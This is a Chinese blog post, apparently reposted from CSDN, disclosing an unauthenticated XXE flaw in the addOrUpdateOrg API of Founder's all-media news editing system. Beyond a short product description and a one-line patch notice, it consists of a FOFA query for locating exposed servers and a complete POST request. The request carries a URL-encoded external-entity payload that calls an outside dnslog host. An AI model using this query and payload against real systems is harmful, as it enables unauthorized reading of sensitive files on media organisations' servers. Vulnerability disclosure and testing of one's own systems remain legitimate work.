首页 > 其他分享 >方正畅享全媒体新闻采编系统 addOrUpdateOrg xxe漏洞

方正畅享全媒体新闻采编系统 addOrUpdateOrg xxe漏洞

时间:2024-10-11 10:48:07浏览次数:11  
标签:采编 畅享 漏洞 image 媒体 application addOrUpdateOrg 20% xxe

0x01 产品描述:

     方正畅享全媒体新闻采编系统是一个集指挥中心、采集中心、编辑中心、发布中心、绩效考核中心和资料中心为一体的全媒体新闻采编系统‌,主要应用于媒体行业的深度融合,通过大数据和AI技术,实现新闻生产的策、采、编、发、存、传、评的全流程管理‌        

0x02 漏洞描述:

        方正畅享全媒体新闻采编系统 addOrUpdateOrg 接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。
0x03 搜索语句:

Fofa:app="FOUNDER-全媒体采编系统"

0x04 漏洞复现:

POST /newsedit/api/orgUser/addOrUpdateOrg HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Connection: close

xmlStr=%3C!DOCTYPE%20root%20%5B%20%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http://gli10h.dnslog.cn/%22%3E%20%25remote;%5D%3E

0x05 修复建议:

厂商已发布补丁 请即时修复。

标签:采编,畅享,漏洞,image,媒体,application,addOrUpdateOrg,20%,xxe
From: https://blog.csdn.net/xc_214/article/details/142848099

相关文章

  • vulnhub-XXE靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集2、xml外部实体注入四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.202.134)靶 机:ubuntu17.10(192.168.202.161)2、使用工具/软件Kali:arp-scan(主机探测)、nmap......
  • Chat GPT 镜像网站支持最新 O1 模型,国内用户畅享全新AI体验
    随着AI技术的飞速发展,ChatGPT已经成为全球用户不可或缺的智能助手。而如今,为了更好地服务国内用户,最新的ChatGPT镜像网站正式上线,并且全面支持最新的O1模型,为用户带来更加高效、便捷的体验。本文将详细介绍这一镜像网站的功能优势,以及O1模型如何为用户带来更加智能的对话体......
  • XXE-XML实体注入漏洞概述
    XXE-"xmlexternalentityinjection"既"xml外部实体注入漏洞"。概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入......
  • XXE之读取任意文件 BUUCTF [PHP]XXE
    开启BUUCTF靶场,打开链接:很明显是个phpinfo.php文件直接CtflF搜索flag,发现还真有,尝试输入flag看看什么情况?flag{cce98ec0-f1e6-416f-86d7-9b174202e678}呃呃,还真是flag,不过还是换种思路来做吧看到上面有个github的链接,点进去看看发现是一段例子和介绍,将其复......
  • 【重温童年】基于tkinter模块设计的Q宠大乐斗武器升星模拟器:重温经典,畅享休闲时光
    在快节奏的现代生活中,我们总是在寻找那些能够让我们暂时忘却烦恼,沉浸在简单快乐中的休闲方式。对于许多80后、90后而言,Q宠大乐斗无疑是一款充满回忆的经典网页游戏。它以其独特的宠物养成、战斗系统以及丰富多样的武器系统,吸引了无数玩家的心。今天,就让我们一起重温那段美好的......
  • 揭秘!AE2024官方下载渠道+安装步骤,拒绝,畅享正版魅力!
    #揭秘!AE2024官方下载渠道+安装步骤,拒绝,畅享正版魅力!在数字创意领域,AdobeAfterEffects(简称AE)一直是视频特效和动态图形设计的首选工具。随着AE2024的发布,许多设计师和创意工作者都迫不及待地想要体验这一最新版本带来的新功能和改进。然而,在追求最新技术的同时,确保使用正版软件是......
  • vulhub xxe靶机
    步骤一:搜索靶机地址步骤二:利用dirsearsh扫描目录步骤三:进入靶机进入robots.txt步骤四:访问/xxe步骤五:输入用户名密码,利用burp抓包,传送至重放器输入:<?xmlversion="1.0"encoding="UTF-8"?><!DOCTYPEr[<!ELEMENTrANY><!ENTITYadminSYSTEM"php://filter/r......
  • 加速网络体验,Squid缓存代理:让浏览如飞,畅享无限网络速度!
     作者简介:我是团团儿,是一名专注于云计算领域的专业创作者,感谢大家的关注 座右铭:   云端筑梦,数据为翼,探索无限可能,引领云计算新纪元 个人主页:团儿.-CSDN博客目录前言:squid代理的基本类型squid是如何工作的?实验目标:配置squid缓存代理,实现web访问速度的提高Squid的......
  • 【第66课】Java安全&SPEL表达式&SSTI模版注入&XXE&JDBC&MyBatis注入
    免责声明本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。文中所涉......
  • XXE漏洞
    基本概念XML指可扩展标记语言(eXtensibleMarkupLanguage),是一种用于标记电子文件使其具有结构性的标记语言,被设计用来传输和存储数据。文件读取<?xmlversion="1.0"?><!DOCTYPEdata[<!ELEMENTdata(#ANY)><!ENTITYfileSYSTEM"file:///etc/passwd">]><data>&a......